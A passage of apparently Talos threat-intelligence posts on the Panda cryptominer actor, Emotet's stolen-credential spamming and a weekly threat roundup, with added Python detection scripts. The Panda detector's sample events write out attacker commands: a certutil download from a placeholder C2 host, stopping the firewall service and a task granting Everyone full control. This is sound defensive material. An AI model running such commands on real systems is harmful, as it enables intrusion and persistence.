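Added example: the rule names are this script's own labels and the sample
events below are constructed, with a placeholder host instead of a real C2.
"""
import re
from typing import Dict, List, Tuple

# Each rule is (name, compiled pattern). The patterns follow the command lines
# quoted in the write-up; they are deliberately narrow to limit false positives.
PANDA_RULES: List[Tuple[str, "re.Pattern[str]"]] = [
    # "certutil.exe -urlcache -split -f http://.../upnpprhost.exe C:\Windows\Temp\..."
    ("certutil_urlcache_download",
     re.compile(r"certutil(?:\.exe)?\s+.*-urlcache\b.*-f\s+https?://", re.I)),
    # "cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ugrpkute\<file>.exe"
    ("ping_delay_then_start",
     re.compile(r"ping\s+127\.0\.0\.1\s+-n\s+\d+\s*&\s*start\b", re.I)),
    # "cmd /c net stop MpsSvc" (Windows Firewall service)
    ("firewall_service_stop",
     re.compile(r"\bnet\s+stop\s+MpsSvc\b", re.I)),
    # schtasks task that runs cacls to grant Everyone full control
    ("schtasks_cacls_everyone_full",
     re.compile(r"schtasks\s+/create\b.*\bcacls\b.*/p\s+everyone:F", re.I)),
    # Temp-folder payload name: 15 lowercase letters followed by 5 digits
    ("temp_random_15alpha_5digit_exe",
     re.compile(r"\\[Tt]emp\\[a-z]{15}\d{5}\.exe\b")),
]

# Constructed sample events (one command line each). The first five mirror
# behaviours from the write-up; the last two are benign look-alikes.
SAMPLE_EVENTS: List[str] = [
    r"certutil.exe -urlcache -split -f http://c2.example.invalid/upnpprhost.exe C:\Windows\Temp\upnpprhost.exe",
    r"cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ugrpkute\wercplshost.exe",
    r"cmd /c net stop MpsSvc",
    r'cmd /c schtasks /create /sc minute /mo 1 /tn "Netframework" /ru system /tr "cmd /c echo Y|cacls C:\Windows\appveif.exe /p everyone:F"',
    r"C:\Windows\Temp\xblzcdsafdmqslz19595.exe",
    r"certutil.exe -verify cert.cer",
    r"ping 8.8.8.8 -n 1",
]


def match_panda_ttps(cmdline: str) -> List[str]:
    """Return the names of every rule the command line matches (empty if none)."""
    return [name for name, rx in PANDA_RULES if rx.search(cmdline)]


def scan(events: List[str]) -> Dict[str, List[str]]:
    """Map each flagged command line to its matched rule names; unflagged lines are dropped."""
    hits: Dict[str, List[str]] = {}
    for cmdline in events:
        matched = match_panda_ttps(cmdline)
        if matched:
            hits[cmdline] = matched
    return hits


if __name__ == "__main__":
    for cmdline, names in scan(SAMPLE_EVENTS).items():
        print(f"{', '.join(names):32s} <- {cmdline}")
```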


                Conclusion

                Panda's operational security remains poor, with many of their old and current domains all hosted on the same IP and their TTPs remaining relatively similar throughout campaigns. The payloads themselves are also not very sophisticated.

                However, system administrators and researchers should never underestimate the damage an actor can do with widely available tools such as Mimikatz. Some information from HFS used by Panda shows that this malware had a wide reach and rough calculations on the amount of Monero generated show they made around 1,215 XMR in profits through their malicious activities, which today equals around $100,000, though the amount of realized profits is dependent on the time they sold.

Panda remains one of the most consistent actors engaging in illicit mining attacks and frequently shifts the infrastructure used in their attacks. They also frequently update their targeting, using a variety of exploits to target multiple vulnerabilities, and are quick to start exploiting known vulnerabilities shortly after public POCs become available, becoming a menace to anyone slow to patch. And, if a cryptocurrency miner is able to infect your system, that means another actor could use the same infection vector to deliver other malware. Panda remains an active threat and Talos will continue to monitor their activity in order to thwart their operations.


                COVERAGE

                For coverage related to blocking illicit cryptocurrency mining, please see the Cisco Talos white paper: Blocking Cryptocurrency Mining Using Cisco Security Products

                Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

                Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

                Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

                AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

                Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

                Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

                IOCs

                Domains


                IPs


                SHA-256


                Monero Wallets


                Emotet is back after a summer break

                This blog post was written by Colin Grady, William Largent, and Jaeson Schultz.


                Emotet is still evolving, five years after its debut as a banking trojan. It is one of the world's most dangerous botnets and malware droppers-for-hire. The malware payloads dropped by Emotet serve to more fully monetize their attacks, and often include additional banking trojans, information stealers, email harvesters, self-propagation mechanisms and even ransomware.

At the beginning of June 2019, Emotet's operators decided to take an extended summer vacation. Even the command and control (C2) activities saw a major pause in activity. However, as summer begins drawing to a close, Talos and other researchers started to see increased activity in Emotet's C2 infrastructure. And as of Sept. 16, 2019, the Emotet botnet has fully reawakened, and has resumed spamming operations once again. While this reemergence may have many users scared, Talos' traditional Emotet coverage and protection remains the same. We have a slew of new IOCs to help protect users from this latest push, but past Snort coverage will still block this malware, as will traditional best security practices such as avoiding opening suspicious email attachments and using strong passwords.

                Emotet's email propagation

                One of Emotet's most devious methods of self-propagation centers around its use of socially engineered spam emails. Emotet's reuse of stolen email content is extremely effective. Once they have swiped a victim's email, Emotet constructs new attack messages in reply to some of that victim's unread email messages, quoting the bodies of real messages in the threads.


                The email above illustrates Emotet's social engineering. In this example, we have a malicious email from Emotet, and contained inside the body of the email we can see a previous conversation between two aides to the mayor of a U.S. city.
                1. Initially, Lisa sent an email to Erin about placing advertisements to promote an upcoming ceremony where the mayor would be in attendance.
                2. Erin replied to Lisa inquiring about some of the specifics of the request.
                3. Lisa became infected with Emotet. Emotet then stole the contents of Lisa's email inbox, including this message from Erin.
                4. Emotet composed an attack message in reply to Erin, posing as Lisa. An infected Word document is attached at the bottom.
                It's easy to see how someone expecting an email as part of an ongoing conversation could fall for something like this, and it is part of the reason that Emotet has been so effective at spreading itself via email. By taking over existing email conversations, and including real Subject headers and email contents, the messages become that much more randomized, and more difficult for anti-spam systems to filter.

                Emotet's email sending infrastructure

                This message wasn't sent using Lisa's own Emotet-infected computer through her configured outbound mail server. Instead, this email was transmitted from an Emotet infection in a completely different location, utilizing a completely unrelated outbound SMTP server.

                It turns out that in addition to stealing the contents of victims' inboxes, Emotet also swipes victims' credentials for sending outbound email. Emotet then distributes these stolen credentials to other bots in its network, which use them to transmit Emotet attack messages.

                In the process of analyzing Emotet, Cisco Talos has detonated hundreds of thousands of copies of the Emotet malware inside of our malware sandbox, Threat Grid. Over the past 10 months, Emotet has attempted to use Threat Grid infections as outbound spam emitters nearly 19,000 times.

                When Emotet's C2 designates one of its infections as a spam emitter, the bot will receive a list of outbound email credentials containing usernames, passwords and mail server IP addresses. Over the past 10 months, Cisco Talos collected 349,636 unique username/password/IP combos. Of course, many larger networks deploy multiple mail server IP addresses, and in the data we saw a fair amount of repeat usernames and passwords using different, but related mail server IPs. Eliminating the server IP data, and looking strictly at usernames and passwords, Talos found 202,675 unique username-password combinations.

                Since Talos observed infections over a months-long timeframe, we were able to assess the average lifespan of the credentials we saw Emotet distributing. In all, the average lifespan of a single set of stolen outbound email credentials was 6.91 days. However, the distribution is heavily skewed: 75 percent of the credentials stolen and used by Emotet lasted under one day, and 92 percent disappeared within one week. The remaining 8 percent of Emotet's outbound email infrastructure had a much longer lifespan.

                In fact, we found some outbound credentials that were utilized by Emotet for the entire duration of our sample data. Below is a graph illustrating the volume of credentials having a longer lifespan with days along the X-axis vs. the number of stolen SMTP credentials along the Y-axis. There are quite a few stolen outbound email credentials that Emotet has been using over a period of many months. Talos is reaching out to the affected networks in an attempt to remediate some of the current worst offenders.
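One way a mail operator can spot its own accounts being used as Emotet spam emitters, offered here as an added example rather than anything from the post: because a stolen credential is handed to bots in unrelated locations, the same account begins authenticating from several untrusted source IPs within a short window. The Python below parses Postfix-style SASL login lines (a constructed sample in an assumed format), ignores the organization's own egress range, and alerts when one account exceeds a threshold of distinct sources inside 24 hours. The trusted network, window and threshold are assumptions to tune locally.

```python
"""Detect one SMTP account authenticating from many unrelated sources.

Added example, not Talos code. Log format, trusted range, window and threshold
are assumptions; the log lines are constructed, not a real capture.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

# Postfix-style smtpd SASL lines (assumed format). Lines are assumed chronological.
SAMPLE_LOG = """\
Sep 16 09:12:01 mx1 postfix/smtpd[4412]: 7D3A1B: client=unknown[198.51.100.23], sasl_method=LOGIN, sasl_username=lisa@example.gov
Sep 16 09:15:44 mx1 postfix/smtpd[4412]: 7D3A2C: client=unknown[198.51.100.23], sasl_method=LOGIN, sasl_username=erin@example.gov
Sep 16 09:40:10 mx1 postfix/smtpd[4419]: 7D3B07: client=unknown[203.0.113.45], sasl_method=PLAIN, sasl_username=lisa@example.gov
Sep 16 09:50:02 mx1 postfix/smtpd[4419]: 7D3B11: client=unknown[203.0.113.77], sasl_method=PLAIN, sasl_username=erin@example.gov
Sep 16 10:05:33 mx1 postfix/smtpd[4420]: 7D3B5F: client=unknown[192.0.2.9], sasl_method=PLAIN, sasl_username=lisa@example.gov
Sep 16 10:30:18 mx1 postfix/smtpd[4420]: 7D3B9A: client=unknown[203.0.113.200], sasl_method=PLAIN, sasl_username=lisa@example.gov
Sep 16 11:00:00 mx1 postfix/smtpd[4421]: 7D3C00: client=unknown[203.0.113.77], sasl_method=PLAIN, sasl_username=erin@example.gov
Sep 16 11:02:11 mx1 postfix/smtpd[4421]: 7D3C01: client=unknown[192.0.2.9], sasl_method=PLAIN, sasl_username=lisa@example.gov
Sep 18 10:00:00 mx1 postfix/smtpd[5001]: 7E0001: client=unknown[192.0.2.9], sasl_method=PLAIN, sasl_username=lisa@example.gov
"""

LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ postfix/smtpd\[\d+\]: \w+: "
    r"client=\S+\[(?P<ip>[\d.]+)\], sasl_method=\w+, sasl_username=(?P<user>\S+)$"
)
LOG_YEAR = 2019                                  # syslog timestamps carry no year
TRUSTED_NETS = [ip_network("198.51.100.0/24")]   # assumption: the org's own egress range
WINDOW = timedelta(hours=24)
MAX_DISTINCT_SOURCES = 3                         # assumption: tune to how mobile your users are


def parse_line(line):
    """Return (timestamp, account, source_ip) or None for lines that are not SASL logins."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{LOG_YEAR} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["user"].lower(), ip_address(m["ip"])


def find_shared_credential_use(lines):
    """Return [(account, time, sorted distinct source IPs)] for every account that
    authenticated from MAX_DISTINCT_SOURCES or more untrusted IPs inside WINDOW.
    One alert per account per window so a busy bot does not flood the queue."""
    recent = defaultdict(list)   # account -> [(ts, ip)] still inside the window
    suppressed_until = {}
    alerts = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, user, ip = parsed
        if any(ip in net for net in TRUSTED_NETS):
            continue                     # the organization's own clients
        cutoff = ts - WINDOW
        events = [(t, a) for t, a in recent[user] if t >= cutoff] + [(ts, ip)]
        recent[user] = events
        distinct = sorted({str(a) for _, a in events})
        if len(distinct) >= MAX_DISTINCT_SOURCES and suppressed_until.get(user, datetime.min) <= ts:
            alerts.append((user, ts, distinct))
            suppressed_until[user] = ts + WINDOW
    return alerts


if __name__ == "__main__":
    for user, ts, ips in find_shared_credential_use(SAMPLE_LOG.splitlines()):
        print(f"{ts} {user} authenticated from {len(ips)} sources in 24h: {', '.join(ips)}")
```

On the sample, only lisa@example.gov trips the rule (three untrusted sources by 10:30 on Sept. 16); the Sept. 18 login falls outside the window and does not re-alert. Erin's repeated logins from one home address stay quiet, which is the point of counting distinct sources rather than raw volume.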

                Emotet's recipients

                As opposed to simply drafting new attack messages, stealing old email messages and jumping into the middle of an existing email conversation is a fairly expensive thing to do. Looking at all the email Emotet attempted to send during the month of April 2019, we found Emotet included stolen email conversations only approximately 8.5 percent of the time. Since Emotet has reemerged, however, we have seen an increase in this tactic with stolen email threads appearing in almost one quarter of Emotet's outbound emails.

                Emotet also apparently has a considerable database of potential recipients to draw from. Looking at all of the intended recipients of Emotet's attack messages in April 2019, we found that 97.5 percent of Emotet's recipients received only a single message. There was, however, one victim who managed to receive ten Emotet attack messages during that same period. Either Emotet has something against that guy in particular, or, more likely, it is simply an artifact of the method Emotet uses to distribute victim email addresses to its outbound spam emitters.

                A word about passwords


                Emotet's stolen outbound email credentials contained over 176,000 unique passwords, so we decided to have a look at the passwords by themselves, without regard to the username or mail server IP. Below is a list of the most common passwords, and on the left hand side is the number of unique outbound SMTP credentials found utilizing that particular password.


                It comes as no surprise that perennially problematic passwords such as "123456" and "password" (along with numerous variations of those) appear with significant prominence. However, other passwords in the set are far more distinctive, which raises the question of why so many different accounts would use the same strange password. Most likely these belong to Emotet victims who themselves controlled a large number of distinct mailboxes while also committing the cybersecurity cardinal sin of reusing the same password across many different accounts.



                Conclusion

                Emotet has been around for years, so this reemergence comes as no surprise. The good news is that the same advice for staying protected from Emotet still applies. To avoid Emotet taking advantage of your email account, use strong passwords and opt in to multi-factor authentication if your email provider offers it. Be wary of emails that seem to be unexpected replies to old threads, emails that seem suspiciously out of context, or messages that come from familiar names but unfamiliar email addresses. As always, you can rely on Snort rules to keep your system and network protected. Previous Snort rules Talos has released will still protect against this wave of Emotet, and there is always the opportunity for new coverage in the future.

                This is also a good opportunity to recognize that security researchers and practitioners can never take their foot off the gas. When a threat group goes silent, it's unlikely they'll be gone forever. Rather, this opens up the opportunity for a threat group to return with new IOCs, tactics, techniques and procedures or new malware variants that can avoid existing detection. Just as we saw earlier this year with the alleged breakup of the threat actors behind Gandcrab, it's never safe to assume a threat is gone for good.

                IoCs

                Indicators of compromise related to Emotet's latest activity can be found here.

                Coverage

                Additional ways our customers can detect and block this threat are listed below.

                Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

                Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

                Email Security can block malicious emails sent by threat actors as part of their campaign.

                Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

                AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

                Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

                Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

                Threat Source newsletter (Sept. 19, 2019)


                Newsletter compiled by Jon Munshaw.

                Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

                We’re all still trying to shake off the summer. Gone are the early Fridays, beach vacations and days by the pool. Turns out, attackers may be brushing the same things off. The ever-present Emotet went quiet over the summer, but it’s back now with a slew of new campaigns. While this may sound concerning, the same protections and coverage you’ve always used will keep you safe.

                And, speaking of things that won’t stay down, cryptocurrency miners still aren’t going anywhere. We've discovered a new threat actor we’re calling “Panda” that is rapidly spreading miners, even as digital currencies decline in value.

                This was also a busy week for vulnerability discovery. We’ve got three new vulnerability spotlights out: the Aspose PDF API, Atlassian’s Jira software and the AMD ATI Radeon line of graphics cards.

                We also have our weekly Threat Roundup, which you can find on the blog every Friday afternoon. There, we go over the most prominent threats we’ve seen (and blocked) over the past week.


                Upcoming public engagements with Talos

                Event: “DNS on Fire” at Virus Bulletin 2019
                Location: Novotel London West hotel, London, U.K.
                Date: Oct. 2 - 4
                Speaker: Warren Mercer and Paul Rascagneres
                Synopsis: In this talk, Paul and Warren will walk through two campaigns Talos discovered that targeted DNS. The first actor developed a piece of malware, named “DNSpionage,” targeting several government agencies in the Middle East, as well as an airline. During the research process for DNSpionage, we also discovered an effort to redirect the targets' DNS records and found SSL certificates that had been registered for them. The talk will go through the two actors’ tactics, techniques and procedures and the makeup of their targets.

                Event: “It’s never DNS...It was DNS: How adversaries are abusing network blind spots” at SecTor
                Location: Metro Toronto Convention Center, Toronto, Canada
                Date: Oct. 7 - 10
                Speaker: Edmund Brumaghin and Earl Carter
                Synopsis: While DNS is one of the most commonly used network protocols in most corporate networks, many organizations don’t give it the same level of scrutiny as other network protocols present in their environments. DNS has become increasingly attractive to both red teams and malicious attackers alike to easily subvert otherwise solid security architectures. This presentation will provide several technical breakdowns of real-world attacks that have been seen leveraging DNS for a variety of purposes such as DNSMessenger, DNSpionage, and more.

                Cyber Security Week in Review

                • Microsoft rolled out a new Windows updater tool that is designed to make it easier for users to apply patches, but researchers have already found a string of bugs and flaws. 
                • The LastPass password manager contained a security vulnerability that could have leaked users’ login information to sites they previously visited while utilizing LastPass. The company says it’s released an update to fix this flaw. 
                • An advanced threat group has compromised the networks of at least 11 information technology service providers, likely with the hopes of gaining access to their customers’ systems. At least two of the attacks allowed the malicious actors to gain admin-level access to the victims’ networks. 
                • Facebook plans to assemble a “court” to make the final decision on content restrictions. The social media giant says both the company itself and users will be able to appeal decisions to this board. 
                • The FBI attempted to install a backdoor on mobile devices sold by an encrypted cellular company. Phantom Secure, which is known for selling encrypted phones to some drug cartel members, was later shut down in 2018 for data leaks and its connection to criminal operations. 
                • Many popular smart TV manufacturers collect and sell users’ viewing habits and other personal information, including their IP address. 
                • Australia believes China is behind an attack from earlier this year on its parliament and three largest political parties. However, leaders there have been reticent to publicly call China out at the risk of disrupting Australia’s economy. 
                • A global cyber security trade group suspended Huawei from its board. Huawei blamed the United States for the disruption, saying American influence led the group to making this decision. 
                • New banking regulations in Europe could leave financial institutions more open to cyber attacks, according to a new report. Known as “Open Banking,” these new policies are aimed at giving customers more control over the information they share with banks, but it also brings third-party financial technology companies into the fold. 

                Notable recent security issues

                Title: Remote code execution vulnerability in some AMD Radeon cards 
                Description: A line of AMD Radeon cards contains a remote code execution vulnerability in the ATIDXX64.DLL driver. AMD produces the Radeon line of hardware, which includes graphics cards and graphics processing units. This specific vulnerability exists on the Radeon RX 550 and the 550 Series while running VMware Workstation 15. An attacker could exploit this vulnerability by supplying a malformed pixel shader inside the VMware guest operating system to the driver. This could corrupt memory in a way that would allow the attacker to remotely execute code on the victim machine.
                Snort SIDs: 49978, 49979 (Written by Tim Muniz)

                Title: Atlassian Jira service contains multiple vulnerabilities, including remote JavaScript execution
                Description: Atlassian’s Jira software contains multiple vulnerabilities that could allow an attacker to carry out a variety of actions, including the disclosure of sensitive information and the remote execution of JavaScript code. Jira is a piece of software that allows users to create, manage and organize tasks and manage projects. These bugs could create a variety of scenarios, including the ability to execute code inside of Jira and the disclosure of information inside of tasks created in Jira, including attached documents.
                Snort SIDs: 50110, 50111 (Written by Amit Raut), 50114 (Written by Josh Williams)

                Most prevalent malware files this week

                SHA 256: 7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510 
                MD5: 4a50780ddb3db16ebab57b0ca42da0fb
                Typical Filename: xme64-2141.exe
                Claimed Product: N/A
                Detection Name: W32.7ACF71AFA8-95.SBX.TG

                SHA 256: 26da22347f1d91f6ca56b7c47644a776b72251d3de11c90d9fd77556d5236f5e 
                MD5: f6f6039fc64ad97895142dc99554e971
                Typical Filename: CSlast.gif
                Claimed Product: N/A
                Detection Name: W32.26DA22347F-100.SBX.TG

                SHA 256: 46b241e3d33811f7364294ea99170b35462b4b5b85f71ac69d75daa487f7cf08
                MD5: db69eaaea4d49703f161c81e6fdd036f
                Typical Filename: xme32-2141-gcc.exe
                Claimed Product: N/A
                Detection Name: W32.46B241E3D3-95.SBX.TG

                SHA 256: 093cc39350b9dd2630a1b48372abc827251a3d37bd88c35cea2e784359b457d7 
                MD5: 3c7be1dbe9eecfc73f4476bf18d1df3f
                Typical Filename: sayext.gif
                Claimed Product: N/A
                Detection Name: W32.093CC39350-100.SBX.TG

                SHA 256: 15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b
                MD5: 799b30f47060ca05d80ece53866e01cc
                Typical Filename: mf2016341595.exe
                Claimed Product: N/A
                Detection Name: W32.Generic:Gen.22fz.1201 

                Threat Roundup for September 13 to September 20

                Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Sept. 13 and Sept. 20. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

                As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.


                For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.
                The most prevalent threats highlighted in this roundup are:
                Threat Name    Type    Description
                Win.Dropper.Ursnif-7171615-0 Dropper Ursnif is used to steal sensitive information from an infected host and can also act as a malware downloader. It is commonly spread through malicious emails or exploit kits.
                Win.Malware.Zusy-7171614-1 Malware Zusy, also known as TinyBanker or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe." When the user accesses a banking website, it displays a form to trick the user into submitting personal information.
                Win.Malware.Nanocore-7171596-1 Malware Nanocore is a .NET remote access trojan. Its source code has been leaked several times, making it widely available. Like other RATs, it allows full control of the system, including recording video and audio, stealing passwords, downloading files and recording keystrokes.
                Win.Malware.Emotet-7171351-0 Malware Emotet is a banking trojan that has remained relevant due to its continual evolution to better avoid detection. It is commonly spread via malicious emails. It recently resurfaced after going quiet over the summer of 2019.
                Win.Trojan.XtremeRAT-7170522-1 Trojan XtremeRAT is a remote access trojan active since 2010 that allows the attacker to eavesdrop on users and modify the running system. The source code for XtremeRAT, written in Delphi, was leaked online and has since been used by similar RATs.
                Win.Downloader.Upatre-7170342-1 Downloader Upatre is a trojan that is often delivered through spam emails with malicious attachments or links. It is known to be a downloader and installer for other malware.
                Win.Trojan.Gh0stRAT-7170222-1 Trojan Gh0stRAT is a well-known family of remote access trojans designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. The source code for Gh0stRAT has been publicly available on the Internet for years, significantly lowering the barrier for actors to modify and reuse the code in new attacks.
                Win.Packed.Blackshades-7168564-1 Packed Blackshades is a prevalent trojan with many capabilities including logging keystrokes, recording video from webcams, and downloading and executing additional malware.
                Win.Ransomware.Cerber-7168312-0 Ransomware Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber," although in more recent campaigns this is no longer the case.

                Threat Breakdown

                Win.Dropper.Ursnif-7171615-0

                Indicators of Compromise

                Registry Keys    Occurrences
                <HKCU>\SOFTWARE\MICROSOFT\IAM
                Value Name: Server ID
                20
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: appmmgmt
                20
                <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
                Value Name: Install
                20
                <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
                Value Name: Scr
                20
                <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
                Value Name: Client
                20
                <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
                Value Name: Temp
                20
                <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
                Value Name: {F50EA47E-D053-EF14-82F9-0493D63D7877}
                20
                <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
                Value Name: {6A4DAFE8-C11D-2C5C-9B3E-8520FF528954}
                20
                Mutexes    Occurrences
                Local\{57025AD2-CABB-A1F8-8C7B-9E6580DFB269}    20
                Local\{7FD07DA6-D223-0971-D423-264D4807BAD1}    20
                Local\{B1443895-5CF6-0B1E-EE75-506F02798413}    20
                {A7AAF118-DA27-71D5-1CCB-AE35102FC239}    20
                {5B703C72-FEE9-4509-E0BF-12491463668D}    20
                IP Addresses contacted by malware. Does not indicate maliciousness    Occurrences
                104[.]20[.]0[.]85    10
                104[.]20[.]1[.]85    10
                216[.]218[.]185[.]162    1
                Domain Names contacted by malware. Does not indicate maliciousness    Occurrences
                www[.]ietf[.]org    20
                networkinpreinformation[.]in    20
                Files and or directories created    Occurrences
                %APPDATA%\Mozilla\Firefox\Profiles\1lcuq8ab.default\prefs.js    20
                \{4BC230AC-2EB3-B560-90AF-42B9C45396FD}    20
                %APPDATA%\ds32mapi    20
                %APPDATA%\ds32mapi\dhcpxva2.exe    20
                %TEMP%\<random, matching [A-F0-9]{3,4}>    20
                %TEMP%\<random, matching [A-F0-9]{3,4}\[A-F0-9]{2,4}>.bat    20
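The indicator lists in this roundup are published as text tables (and in the accompanying JSON). As an added example, not Talos tooling, the following Python parses a block in that text form (one indicator per line followed by its occurrence count), refangs the `[.]` notation, turns the `%VAR%` and `<random, matching ...>` file entries into suffix regexes, and checks constructed endpoint telemetry against the result. The sample IOC text is a subset of the Ursnif entries above; the telemetry records are made up for the example.

```python
"""Parse a Threat Roundup indicator block and hunt for it in endpoint telemetry.

Added example, not Talos tooling. The IOC text below is a subset of the Ursnif
entries in the roundup, one indicator per line followed by its occurrence count;
the telemetry records are constructed for the example.
"""
import re

SAMPLE_IOC_TEXT = r"""
Registry Keys    Occurrences
<HKCU>\SOFTWARE\MICROSOFT\IAM
Value Name: Server ID
20
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: appmmgmt
20
Mutexes    Occurrences
Local\{57025AD2-CABB-A1F8-8C7B-9E6580DFB269}    20
IP Addresses contacted by malware. Does not indicate maliciousness    Occurrences
104[.]20[.]0[.]85    10
216[.]218[.]185[.]162    1
Domain Names contacted by malware. Does not indicate maliciousness    Occurrences
www[.]ietf[.]org    20
networkinpreinformation[.]in    20
Files and or directories created    Occurrences
%APPDATA%\ds32mapi\dhcpxva2.exe    20
%TEMP%\<random, matching [A-F0-9]{3,4}\[A-F0-9]{2,4}>.bat    20
"""

# Section headings as printed in the roundup -> keys used below.
SECTIONS = {"Registry Keys": "registry", "Mutexes": "mutexes", "IP Addresses": "ips",
            "Domain Names": "domains", "Files and or directories created": "files"}


def parse_roundup_iocs(text):
    """Return {"registry": [...], "mutexes": [...], "ips": [...], "domains": [...], "files": [...]}.
    Registry entries span several lines (key, optional 'Value Name:', count); everything
    else is 'indicator<whitespace>count'. IPs and domains are refanged."""
    iocs = {key: [] for key in SECTIONS.values()}
    section, pending = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        head = next((h for h in SECTIONS if line.startswith(h)), None)
        if head and line.endswith("Occurrences"):
            section = SECTIONS[head]
            continue
        if section == "registry":
            if line.startswith("<HK"):
                parts = line.rsplit(None, 1)   # a key with no value carries its count inline
                if len(parts) == 2 and parts[1].isdigit():
                    iocs["registry"].append({"key": parts[0], "value": None, "count": int(parts[1])})
                else:
                    pending = {"key": line, "value": None}
            elif line.startswith("Value Name:") and pending:
                pending["value"] = line.split(":", 1)[1].strip()
            elif line.isdigit() and pending:
                iocs["registry"].append({**pending, "count": int(line)})
                pending = None
        elif section:
            parts = line.rsplit(None, 1)
            if len(parts) != 2 or not parts[1].isdigit():
                continue
            indicator = parts[0].replace("[.]", ".") if section in ("ips", "domains") else parts[0]
            iocs[section].append({"indicator": indicator, "count": int(parts[1])})
    return iocs


def file_pattern(ioc):
    """Compile a file IOC into a case-insensitive suffix regex. The %VAR% prefix is
    dropped (its expansion differs per user), and '<random, matching RE>' becomes RE.
    The roundup writes path separators unescaped inside RE, so escape them."""
    ioc = re.sub(r"^%[A-Za-z0-9()]+%", "", ioc)
    parts = re.split(r"<random, matching (.+?)>", ioc)
    body = "".join(re.escape(p) if i % 2 == 0 else p.replace("\\", "\\\\")
                   for i, p in enumerate(parts))
    return re.compile(body + "$", re.IGNORECASE)


def hunt(iocs, events):
    """Return (type, value) for every telemetry record matching an indicator."""
    registry = set()
    for r in iocs["registry"]:
        path = r["key"].replace("<", "").replace(">", "")
        registry.add((path + "\\" + r["value"] if r["value"] else path).lower())
    domains = {d["indicator"].lower() for d in iocs["domains"]}
    ips = {i["indicator"] for i in iocs["ips"]}
    files = [file_pattern(f["indicator"]) for f in iocs["files"]]
    hits = []
    for ev in events:
        kind, value = ev["type"], ev["value"]
        if (kind == "registry" and value.lower() in registry
                or kind == "dns" and value.lower().rstrip(".") in domains
                or kind == "netconn" and value in ips
                or kind == "file" and any(p.search(value) for p in files)):
            hits.append((kind, value))
    return hits


SAMPLE_EVENTS = [  # constructed endpoint telemetry, not a real capture
    {"type": "registry", "value": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\appmmgmt"},
    {"type": "registry", "value": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive"},
    {"type": "dns", "value": "networkinpreinformation.in"},
    {"type": "dns", "value": "www.ietf.org"},
    {"type": "netconn", "value": "216.218.185.162"},
    {"type": "file", "value": r"C:\Users\u\AppData\Roaming\ds32mapi\dhcpxva2.exe"},
    {"type": "file", "value": r"C:\Users\u\AppData\Local\Temp\A1F\3B.bat"},
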